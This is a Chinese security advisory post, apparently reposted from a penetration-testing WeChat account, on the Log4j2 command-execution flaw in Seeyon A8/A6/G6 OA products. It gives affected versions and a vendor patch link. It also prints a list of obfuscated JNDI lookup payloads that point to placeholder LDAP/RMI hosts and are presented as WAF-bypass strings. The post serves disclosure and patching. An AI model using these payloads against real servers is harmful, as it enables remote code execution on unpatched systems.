致远A8产品Log4j2存在命令执行

渗透技巧 2年前 (2021) admin
2,206 0 0

点击蓝字 ·  关注我们

01

漏洞描述

  致远互联A8+是面向集团化、国际化、产业链和大型组织机构、涉外工作组织及组织群,针对其 组织范围内外协作应用设计的集团化管控和业务管控的一体化门户平台和工作入口。由于Apache Log4j2某些功能存在递归解析功能,未经身份验证的攻击者通过发送特别构造的数据请求包,可在受影响的致远相关版本进行代码执行,发现在野利用,建议相关用户尽快采取措施进行排查与防护。

Apache  Log4j2是一款Apache软件基金会的开源基础框架,用于Java日志记录的工具。日志记录主要用来监视代码中变量的变化情况,周期性的记录到文件中供其他应用进行统计分析工作;跟踪代码运行时轨迹,作为日后审计的依据;担当集成开发环境中的调试器的作用,向文件或控制台打印代码的调试信息。其在JAVA生态环境中应用极其广泛,影响巨大。

致远OA产品受此漏洞影响,在特定情况下达到远程命令执行的效果。

02

漏洞验证


1  

本地搭建致远oa,发送payload测试

致远A8产品Log4j2存在命令执行

致远A8产品Log4j2存在命令执行


服务器的ldap监听到返回的命令


2

黑客可能会采取以下措施对WAF进行Bypass

${${::-j}${::-n}${::-d}${::-i}:${::-r}${::-m}${::-i}://asdasd.asdasd.asdasd/poc}${${::-j}ndi:rmi://asdasd.asdasd.asdasd/ass}${jndi:rmi://adsasd.asdasd.asdasd}${${lower:jndi}:${lower:rmi}://adsasd.asdasd.asdasd/poc}${${lower:${lower:jndi}}:${lower:rmi}://adsasd.asdasd.asdasd/poc}${${lower:j}${lower:n}${lower:d}i:${lower:rmi}://adsasd.asdasd.asdasd/poc}${${lower:j}${upper:n}${lower:d}${upper:i}:${lower:r}m${lower:i}}://xxxxxxx.xx/poc}
致远A8产品Log4j2存在命令执行致远A8产品Log4j2存在命令执行

03

受影响产品

致远OA-A8/A6/G6/v-join产品线V6.1(包含)至V8.1的所有版本(包含部署的全文检索数据转储音视频等)

致远OA-DEE

04

漏洞修复

致远OA官网针对产品给了对应的补丁,请及时去官网下载相对应的补丁更新。

https://service.seeyon.com/patchtools/tp.html#/patchList?type=%E5%AE%89%E5%85%A8%E8%A1%A5%E4%B8%81&id=96

EDI安全

致远A8产品Log4j2存在命令执行

扫二维码|关注我们

一个专注渗透实战经验分享的公众号


原文始发于微信公众号(EDI安全):致远A8产品Log4j2存在命令执行

版权声明:admin 发表于 2021年12月14日 下午12:30。
转载请注明:致远A8产品Log4j2存在命令执行 | CTF导航

相关文章

暂无评论

您必须登录才能参与评论!
立即登录
暂无评论...